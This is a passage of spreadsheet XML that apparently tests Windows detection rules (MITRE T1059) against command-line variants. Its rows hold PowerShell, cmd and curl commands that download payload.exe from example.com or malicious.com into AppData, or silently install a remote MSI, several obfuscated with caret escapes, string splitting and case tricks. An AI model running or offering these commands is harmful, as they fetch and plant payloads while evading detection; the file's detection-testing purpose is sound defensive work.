      <c r="A14" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B14" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C14" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D14" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E14" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F14" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G14" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H14" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I14" s="43" t="n"/>
      <c r="J14" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K14" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="15" ht="22.5" customHeight="1" s="42">
      <c r="A15" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B15" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C15" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D15" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E15" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F15" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G15" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H15" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I15" s="43" t="n"/>
      <c r="J15" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K15" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="22.5" customHeight="1" s="42">
      <c r="A16" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B16" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C16" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D16" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E16" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAND "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F16" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G16" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H16" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I16" s="43" t="n"/>
      <c r="J16" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K16" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="17" ht="22.5" customHeight="1" s="42">
      <c r="A17" s="43" t="n"/>
      <c r="B17" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C17" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D17" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E17" s="4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17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I17" s="43" t="n"/>
      <c r="J17" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K17" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="22.5" customHeight="1" s="42">
      <c r="A18" s="43" t="n"/>
      <c r="B18" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C18" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D18" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E18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18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I18" s="43" t="n"/>
      <c r="J18" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K18" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="19" ht="22.5" customHeight="1" s="42">
      <c r="A19" s="43" t="n"/>
      <c r="B19" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C19" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D19" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E19" s="4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19" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G19" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H19" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I19" s="43" t="n"/>
      <c r="J19" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K19" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="20" ht="22.5" customHeight="1" s="42">
      <c r="A20" s="43" t="n"/>
      <c r="B20" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C20" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D20" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E20" s="4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20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I20" s="43" t="n"/>
      <c r="J20" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K20" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" s="42">
      <c r="A21" s="43" t="n"/>
      <c r="B21" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C21" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D21" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E21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21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21" s="43" t="n"/>
      <c r="J21" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K21" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" s="42">
      <c r="A22" s="43" t="n"/>
      <c r="B22" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C22" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D22" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E22" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"W" Hidden -"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I22" s="43" t="n"/>
      <c r="J22" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K22" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" s="42">
      <c r="A23" s="43" t="n"/>
      <c r="B23" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C23" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D23" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E23" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I23" s="43" t="n"/>
      <c r="J23" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K23" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" s="42">
      <c r="A24" s="43" t="n"/>
      <c r="B24" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C24" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D24" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E24" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I24" s="43" t="n"/>
      <c r="J24" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K24" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" s="42">
      <c r="A25" s="43" t="n"/>
      <c r="B25" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C25" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D25" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E25" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I25" s="43" t="n"/>
      <c r="J25" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K25" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" s="42">
      <c r="A26" s="43" t="n"/>
      <c r="B26" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C26" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D26" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E26" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I26" s="43" t="n"/>
      <c r="J26" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K26" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" s="42">
      <c r="A27" s="43" t="n"/>
      <c r="B27" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C27" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D27" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E27" s="44" t="inlineStr">
        <is>
          <t>powershell -"c" "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27" s="43" t="n"/>
      <c r="J27" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K27" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" s="42">
      <c r="A28" s="43" t="n"/>
      <c r="B28" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C28" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D28" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E28" s="44" t="inlineStr">
        <is>
          <t>powershell /"c" "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I28" s="43" t="n"/>
      <c r="J28" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K28" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" s="42">
      <c r="A29" s="43" t="n"/>
      <c r="B29" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C29" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D29" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E29" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I29" s="43" t="n"/>
      <c r="J29" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K29" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" s="42">
      <c r="A30" s="43" t="n"/>
      <c r="B30" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C30" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D30" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E30" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I30" s="43" t="n"/>
      <c r="J30" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K30" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" s="42">
      <c r="A31" s="43" t="n"/>
      <c r="B31" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C31" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D31" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E31" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F31" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G31" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H31" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I31" s="43" t="n"/>
      <c r="J31" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K31" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1" s="42">
      <c r="A32" s="43" t="n"/>
      <c r="B32" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C32" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D32" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E32" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F32" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G32" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H32" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I32" s="43" t="n"/>
      <c r="J32" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K32" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" s="42">
      <c r="A33" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B33" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C33" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D33" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E33" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I33" s="43" t="n"/>
      <c r="J33" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K33" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" s="42">
      <c r="A34" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B34" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C34" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D34" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E34" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F34" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G34" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H34" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I34" s="43" t="n"/>
      <c r="J34" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K34" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="35" ht="15.75" customHeight="1" s="42">
      <c r="A35" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B35" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C35" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D35" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E35" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F35" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G35" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H35" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I35" s="43" t="n"/>
      <c r="J35" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K35" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="36" ht="15.75" customHeight="1" s="42">
      <c r="A36" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B36" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C36" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D36" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E36" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I36" s="43" t="n"/>
      <c r="J36" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K36" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B37" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C37" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D37" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E37" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I37" s="43" t="n"/>
      <c r="J37" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K37" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B38" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C38" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D38" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E38" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I38" s="43" t="n"/>
      <c r="J38" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K38" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B39" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C39" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D39" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E39" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I39" s="43" t="n"/>
      <c r="J39" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K39" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B40" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C40" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D40" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E40" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F40" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G40" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H40" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I40" s="43" t="n"/>
      <c r="J40" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K40" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B41" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C41" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D41" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E41" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I41" s="43" t="n"/>
      <c r="J41" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K41" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" s="42">
      <c r="A42" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B42" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C42" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D42" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E42" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F42" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G42" s="44" t="b">
        <v>0</v>
      </c>
